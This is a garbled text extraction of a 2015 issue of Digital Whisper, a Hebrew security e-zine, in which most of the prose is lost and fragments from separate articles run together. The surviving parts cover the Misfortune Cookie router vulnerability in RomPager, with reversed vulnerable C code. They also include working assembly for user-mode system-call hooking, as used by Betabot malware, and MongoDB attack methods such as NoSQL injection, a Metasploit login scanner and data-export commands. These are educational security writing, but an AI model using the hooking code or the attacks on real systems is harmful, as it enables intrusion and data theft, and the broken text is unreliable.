Professional Documents
Culture Documents
Digital Whisper
Digital Whisper
,58 2015
:
:
, .5Fingers-
. .
, , - editor@digitalwhisper.co.il
!58 .2015
, - "" ,
"" . - ,
.
, -
" , " . , ,13
, MS00-057- IIS
4 ,5- ( "The UNICODE bug"- ) , MS04-007
" "Kill-Bill .
MS01-033 -
" ,"Code Red MS02-039- " "SQL Slammer .
HeartBleed- ,ShellShock- ( ) , ,"
( , ,
, , ,)"Misfortune Cookie"-
, " " ,
, X ,
, " ,"In the Wild
, ,
-
-.
,
.
, ,
, , .
www.DigitalWhisper.co.il
,58 2015
, ,
, NSA-
. , . ,CISO
, -
. - ,
- .
-
,
-.
!
.
www.DigitalWhisper.co.il
,58 2015
16
MongoDB-
29
45
www.DigitalWhisper.co.il
,58 2015
( )
www.DigitalWhisper.co.il
,58 2015
( ) ,
DHCP , .
www.DigitalWhisper.co.il
,58 2015
, .TR-069
WAN- 7574 .
, HTTP .
.ZMAP
ZMAP , 42- 1
' . , , , 7547
-IP- .IPv4- -IP 46,063,733 ( 1.18%).
, -
( HTTP )80 1.77% . ,
( :fun fact Connection Request .)30005
IPv4- , -IP- 7547
, HTTP . fingerprinting HTTP
"Server"-.HTTP headers-
.
?ROMPAGER
, ( -IP-)
.RomPager ,RomPager ,
. ,embedded HTTP server-
( ) RomPager . ,1996-
( .)5.4 -
www.DigitalWhisper.co.il
,58 2015
:RomPager 4.07
TP-LINK W8961ND .,
firmware- , .ras
, - , .
- #1 firmware , .Binwalk-
( Binwalk- ) firmware-
. - bootloader-
. ( firmware- ) .
-resource ( ) .
, ,Binwalk .ZynOS- embedded ZyXEL
( ZyXEL .)RomPager ,
.ZynOS
www.DigitalWhisper.co.il
,58 2015
. ,ZynOS
.RomPager 4.07
.
, .IDA- (ZynOS header-
" IDA ,)Binwalk , -
( mipsb32 " ) .
-opcode , IDA
. base address- , IDA
.data- ZynOS header-
, .0
, .
.
( , ) .
.
libc ( )strcpy, strcat.. (.)memmove, memcopy
- #2 libc- . binary diffing- libc
. RomPager-
, .
www.DigitalWhisper.co.il
,58 2015
.
-struct :
Struct HttpHeader
{
Void * funcPtr
char * headerName
int size
}
10
. .
, ( USB
, ) . BusPirate- .
RomPager :
bootloader- .
telnet
bootloader-
.
.
, -
instruction pointer (-mips- .)EPC - stack dump-
( , API-
) , callback-
. , callback-
, IDA , offset-.
www.DigitalWhisper.co.il
,58 2015
11
- #4 code exploration- ,
. elf- ,exe IDA
, ( ).
, callback- ,0 .
.
, . instruction pointer-
. ,
shellcode- , "" .
. RomPager 4.07
. , ,
( ) ,
. - .
,
. ,
.
,EPC-
sub-headers ( digest authorization-
,)strcpy- HTTP . ,
() , ,80
.
:
,Misfortune Cookie
.HTTP-
, , ,
.
RomPager ,embedded ,
( )10 .,
www.DigitalWhisper.co.il
,58 2015
12
,C0,C1C9 : ,C0 - C1 ,
, .C9 40.
mips (
branch- ):
- s0 Cookie-( HTTP header- ")"C3=abcd\r\n
- v0
( this - s4 , )0x6b28
FindTokenDelimiter "="
- FindCookieEnd
,mips- C ( ):
)void ParseCookie(Request * request, char * name, char * value
{
)'if (name[0] == 'C
{
;)int index = atoi(name+1
www.DigitalWhisper.co.il
,58 2015
13
;)strncpy(request->CookieArray[index],value,40
}
}
. ,
C1234 HTTP- :
)this->CookieArray + (1234* 40
. , ""
( " )" C-300 . ,
.
, ,
, . ,
,RomPager " index"
.RomPager 4.07
? , ,RomPager
, admin panel-
( .) 7547 ,
, .
, ?RomPager
. -chipset- -
( Trendchip Trendchip .)MediaTek Allegro- RomPager- ,2002- ZynOS-
,Zyxel- SDK- .chipset-
, ,
.
,RomPager- AllegroSoft .
( 2005- )4.34 ,
.
www.DigitalWhisper.co.il
,58 2015
14
-chipset- , (,TP-Link
Dlink) , .
,
, ,
.
,
: ,DDOS NAT- .LAN-
,
.
, .
.
\ :#5
,)4.34( RomPager .
,elf .private symbols ,
. ,binary diffing
,
RomPager . ,
.RomPager
Malware & Vulnerability- ' . , ,
lioro@checkpoint.com -
www.DigitalWhisper.co.il
,58 2015
15
Hooking
( Neurevt Betabot- - )Carberp- . System -
Call Windows Hook- . -
.Git Repository
?Hooking
Hooking- Digital Whisper- Zerith 10
IAT Hooking ,18 Hooking-
.
Inline Hooking- -
Windows API "" ( )Function Prologue 5
:
MOV EDI, EDI
PUSH ESP
MOV EBP, ESP
8B FF:
55:
8B EC:
[ ]newgre.net-
16
,
.
,
. , :
:Windows
Windows ,
User Mode : ,Kernel Mode- Ring3 Ring0- .
User Mode- ( ) .Kernel Mode-
( )
.Kernel Mode-
?
() CreateFileA . User -
,Mode , , Ntfs.sys
?Kernel Mode- ,System Call-
,
User-Mode .
System
,Service Dispatch Table
.
17
System Calls
( )Windows API User Mode
.System Calls : ( NtTerminateProcess, NtCreateMutant')
Windows-
( NtCreateFile .)Ntfs.sys
Windows 2000 :
MOV EAX, SyscallNumber
]LEA EDX, [ESP+4
INT 2Eh
)RETN 4 * (Number of Arguments
1.
2.
3.
4.
.1 EAX .
.2 EDX .
.3 2E .
.4 .
,Windows XP- :
MOV EAX, SyscallNumber
MOV EDX, 7FFE0300h ; EDX = SystemCallStub
]CALL DWORD PTR [EDX
RETN 8
1.
2.
3.
4.
.1 EAX .
.2 EDX 03000x7FFe0 SharedUserData!SystemCallStub :
.KiFastSystemCall-
.3 ( EDX- )ntdll!KiFastSystemCall-
.4 .
?KiFastSystemCall-
1. MOV EDX, ESP
2. SYSTENTER
3. RETN
.1 EDX- .
.2 SYSENTER .
.3 .
System Call Hooking
www.DigitalWhisper.co.il
,58 2015
18
?SYSENTER
, Windows XP- Ring3- Ring0- -
.SYSENTER/SYSEXIT
:Intel IA-32 (64) Programming Manual
"Executes a fast call to a level 0 system procedure or routine. SYSENTER is a companion
instruction to SYSEXIT.
The instruction is optimized to provide the maximum performance for system calls from user
code running at privilege level 3 to
"operating system or executive procedures running at privilege level 0.
- Intel IA-32 (64) programming manual, volume 2B.
Privilege Levels-.
SYSENTER ?INT 2E- INT 2E-
Windows (.)Interrupts
Interrupt Descriptor Table
( Interrupt Service Routines- ) .
INT 2E , 2E IDT- Global -
Descriptor Table ( , Windows
).
, System Call (
" .) L1 Cache- , SYSENTER
(
).
19
,System Calls- :
.1 /INT 2E .SYSENTER
.2 nt!KiFastCallEntry ( nt!KiSystemService-
)
,KiSystemService .3 , EAX- SSDT-
.
- .OSR Online
20
, ( SSDT Hooking) :
.1
, SSDT- ntoskrnl.exe ,
.
.2 -
64 Windows ( Patchguard
(.
.3
- .
21
, ZwTerminateProcess ntdll- . -
SystemCallStub KiFastSystemCall- . -
Hook KiFastSystemCall- .
KiFastSystemCall- ( )8B D4 0F 34
( C3) RETN ( )JMP
( System Call- .)RETN
ntdll KiFastSystemCall
( KiFastSystemCallRet )RETN ( KiIntSystemCall
System Call- Windows 2000 )
)!( 11 .
( SHORT JMP 2 127 ) -
]( [KiFastSystemCallRet+1 , )KiFastSystemCallRet
. Betabot- , Dump
Explorer.exe :Neurevt-
22
.1 .0x7FF3F524
.2 ( 0x7FF3F524 RET
).
PUSH/RET- JMP-
.JMP
, , . ,
, .
.386
.model flat,stdcall
option casemap:none
VirtualProtect Kernel32-
, Kernel32.
; Add kernel32 definitions
; Link against kernel32.lib
include kernel32.inc
includelib kernel32.lib
23
:Data Section
.data
oldProtection dd ?
; For VirtualProtect()
arrayOfEvil DWORD 149h DUP (0), offset newNtSetInformationFile , 40h DUP (0);
Place hooks here by Syscall numbers
KiFastSystemCall : EAX- ,
.code ; Start of code section
start:
mov esi, 07FFE0300h
lodsd
call changeProtection
; ESI = SharedUserData!SystemCallStub
; EAX = KiFastSystemCall
- .VirtualProtect- changeProtection
. VirtualProtect- ,Write KiFastSystemCallRet
changeProtection:
push eax
; Save KiFastSystemCall addr
push offset oldProtection
push 40h
; PAGE_EXECUTE_READWRITE
push 6
; [KiIntSystemCall - KiFastSystemCall]
push eax
call VirtualProtect
; VirutalProtect((void
*)KiFastSystemCall, 6,
PAGE_EXECUTE_READWRITE, &oldProtection)
pop eax
; EAX = KiFastSystemCall addr
retn
EAX EDX
.
1. mov edx, 03EBh ; 0xEB03 =
2. mov [eax], edx
.KiFastSystemCall EDX- .1
.) 3 ( EDX- KiFastSystemCall .2
PUSH/RET- Neurevt-
:KiFastSystemCallRet
1. lea eax, [eax + 5]
mov dl, 68h
mov [eax], dl
; EAX = [KiFastSystemCallRet + 1]
; 0x68 = PUSH
; [KiFastSystemCallRet + 1] = PUSH
2015 ,58
2. inc eax
]; EAX = [KiFastSystemCallRet + 2
mov edx, offset evilCode ; EDX = pointer to our trap
mov [eax], edx
; Now [KiFastSystemCallRet + 1] = PUSH offset
evilCode
]3. lea eax, [eax + 4
]; EAX = [KiFastSystemCallRet + 6
mov dl, 0C3h
; 0xC3 = RET
mov [eax], dl
; [KiFastSystemCallRet + 6] = RETN
.1 - KiFastSysetmCallRet 11
( .)PUSH/RET EAX .
.2 ( PUSH- 0x68 ).
.3 0x68 -Hook- .
.4 PUSH- .RETN
evilCode- .
arrayOfEvil Syscall- .Hook
. Hook -
Hook , .
Hooks , .
hook ( NtSetInformationFile- 0x149 )Windows 7-
, 0x149
.NtSetInformationFile
evilCode:
1. mov ecx, offset arrayOfEvil
]2. lea ecx, [ecx + eax * 4
]3. mov ebx, [ecx
4. cmp ebx, 0
5. jz origKiFastSystemCall
6. jmp ebx
.1 ECX- .
.2 .
.3 EBX- .
.4 .
.5 , , .
.6 , EBX- Hook-.
System Call Hooking
www.DigitalWhisper.co.il
,58 2015
25
.FILE_INFORMATION_CLASS
( 0xD ,
BOOLEAN ) FILE_DISPOSITION_INFORMATION
:
newNtSetInformationFile:
1. Pushad
2. mov edi, [esp + 38h]
3. cmp edi, 0Dh
4. jnz callRealKiFastSystemCall
xor edi, edi
5. mov ebx, [esp + 30h]
6. mov [ebx], dl
7. callRealKiFastSystemCall:
8. popad
9. jmp origKiFastSystemCall
; 0xD = FileDispositionInformation
2015 ,58
Hook- :DeleteFile-
push offset fileToDelete
call DeleteFile
retn
.):
KiFastSystemCall System Calls-:
; SYSENTER
origKiFastSystemCall:
mov edx, esp
dw 340fh
retn
end start
'
KiFastSystemCall- KiIntSystemCall 7.
, KiIntSystemCall- ?
STD( CLD- )Direction-
.KiIntSystemCall- KiIntSystemCall
STD Direction Flag- KiFastSystemCall- CLD
( ]1+KiIntSystemCall[- .)STD-
, CLD, STD
:]1+KiIntSystemCall[-
; 0xFC = CLD, 0xEB0F JMP SHORT 0xE bytes
; EAX = KiIntSystemCall
; 0xFD = STD
edx, 0EEBFCh
[eax], edx
eax, [eax + 10h
dl, 0FDh
[eax], dl
27
mov
mov
lea
mov
mov
Direction Flag- :
Pushfd
pop edx
bt edx, 0Ah
; CF = DF
jc origKiIntSystemCall
mov ecx, offset arrayOfEvil
]lea ecx, [ecx + eax * 4
]mov edx, [ecx
cmp edx, 0
jz origKiFastSystemCall
jmp edx
1.
2.
3.
4.
.1 EFLAGS-.
.2 .EDX
.3 ( )Direction Flag- .Carry Flag-
.4 Carry Flag- , ,KiIntSystemCall- .origKiIntSystemCall-
.Git
Ring3 Rootkits
.
" " , Kernel- ,User Mode- User
Mode .
Hypervisor rootkits UEFI bootkits-
, .
shahakshalev@gmail.com Git-
.
28
MongoDB-
5Fingers
,
. 1970 . ) (Edgar F. Codd
IBM ,
.
:
" ,
- ".
.BIG DATA
() ,BIG DATA
BIG DATA- .
- ?
/ ( )Relational Database
"" ( )
.
. , ,
. SQL .
.
-MongoDB
www.DigitalWhisper.co.il
,58 2015
29
[ ' :1 ]
, :
/ ,,
, , ' . ,
, = .
.
[ ' :2 ]
-MongoDB
www.DigitalWhisper.co.il
,58 2015
30
, , '
, ,
,
' ' /
.
, ( ) (MS-SQL ,Oracle
') :
( )Accessibility ( )
()Data Security
( )
, ()Duplications
()Data Integrity
()Parallel
()Distributed
( ///)
(:)Complexity
- Oracle, Microsoft, IBM - .
(:)Performance
: ,.
(.)Time-Critical
:
, , , .
:
.
.
,
. ( (SQL .
.Scaling NoSQL
.
-MongoDB
www.DigitalWhisper.co.il
,58 2015
31
- BIG DATA
,BIG DATA-
- .BIG DATA
-
- ( )petabyte , '.
- , '
'
.
-
.
NoSQLBIG DATA-
. .
SQL , ,
,constraints Stored Procedures , .
Scale-.
-MongoDB
www.DigitalWhisper.co.il
,58 2015
32
-
NoSQL ( )redundancy.
NoSQL / .
.
NoSQL:
Key-Value-DB
Column-DB
Document-DB
Graph-DB
Object-DB
Document Oriented DB
, , ,
( .)unstructured data .NoSQL
, ,
. " JSON ,YAML ,XML ,BSON- PDF
,Microsoft Office - Word, Excel .
:
/ :
. (
)20 ( , = 20)
: 10 . - .
-MongoDB
www.DigitalWhisper.co.il
,58 2015
33
OK , ?
- SQL Injection " '90
, . SQL
" . .
, ( SQL
) .
.
?NoSQL = No Injection
mongoDB .MongoDB : ( open
)source .Document Oriented mongoDB
' ' ( .Key-Value
).
MongoDB JSON ,BSON
. , MongoDB ,
,SQL :
[ " "Making Mongo Cry: NoSQL for Penetration Testers ]Russell Butturini
-MongoDB
www.DigitalWhisper.co.il
,58 2015
34
, mongoDB- () () .
().
, .
NoSQL Injection :MongoDB
DB-
" SQL :
'SELECT * FROM users WHERE username = '$username' AND password = '$password
MongoDB- .
,mongo :
;)}db.users.find({username: username, password: password
-MongoDB
www.DigitalWhisper.co.il
,58 2015
35
]http://www.somethingofthatilk.com/index.php?id=271 :[
-MongoDB
www.DigitalWhisper.co.il
36
2015 ,58
:MongoDB
- Default Ports .1 MongoDB- ' :
- 27018 --shardsvr :
- 27019 --configsvr :
- 28017 ( ) .
, ,
( - )2 , Shodan- 51,451
:
-MongoDB
www.DigitalWhisper.co.il
,58 2015
37
- Authentication Weakness .2 .
mongoDB
. RDBMS
. ,
,':
Mika / ! ( .digitalwhisper
.)read , ( )
,auth
" .# .
-MongoDB
www.DigitalWhisper.co.il
,58 2015
38
- Authorization Weaknesses .3 .
.
.Admin ,
( admin/) .
.4 - Clear Text ,
ARP Poisoning MITM :
-MongoDB
www.DigitalWhisper.co.il
,58 2015
39
.5 - .mongoDB- mongoDB-
GridFS /data/db/ :
( C:\data\db .)WINDOWS
:
ps -xa | grep mongod
--dbpath- .
:
mongod --dbpath /usr/local/mongodb-data
./usr/local/mongodb-data :
( )mongoDB ,
?
Mongo mongos mongod ,--sslCAFile
, export.
mongoexport -d digitalwhisper -c MyData --out /usr/local/myRecords.json
-MongoDB
www.DigitalWhisper.co.il
,58 2015
40
:NoSQLMap
NoSQLMap ) )Bernardo Damele
) )Miroslav Stampar .SQLMap
NoSQLMap NoSQL
.
.mongoDB- , .
Metasploit Framework .PyMongo- , :
mongoDB , ,
mongoDB .CouchDB- .
-MongoDB
www.DigitalWhisper.co.il
,58 2015
41
, ( )1
:
-MongoDB
www.DigitalWhisper.co.il
,58 2015
42
MongoDB .Metasploit-
" ,"MondoGB_Login :
use auxiliary/scanner/mongodb/mongodb_login
:
auxiliary- .
-MongoDB
www.DigitalWhisper.co.il
,58 2015
43
NoSQL .
.
NoSQL
.
,MondoDB-
:
http://blog.mongodirector.com/10-tips-to-improve-your-mongodb-security/
Mongo-
.
-
, .
( )tisf , .
/
http://2012.zeronights.org/includes/docs/Firstov%20-%20Attacking%20MongoDB.pdf
http://blogs.adobe.com/security/files/2011/04/NoSQL-But-Even-Less-Security.pdf
https://www.youtube.com/watch?v=Cy8-EYS3HeM
https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf
http://blog.spiderlabs.com/2013/03/mongodb-security-weaknesses-in-a-typical-nosql-
database.html
http://blog.mongodirector.com/10-tips-to-improve-your-mongodb-security/
-MongoDB
www.DigitalWhisper.co.il
,58 2015
44
58- ,Digital Whisper
- . , , ,
.
, , .
- Digital Whisper !
" " ,
, .editor@digitalwhisper.co.il
, , :
www.DigitalWhisper.co.il
""Talkin' bout a revolution sounds like a whisper
.2015
,
,
31.01.2015
www.DigitalWhisper.co.il
,58 2015
45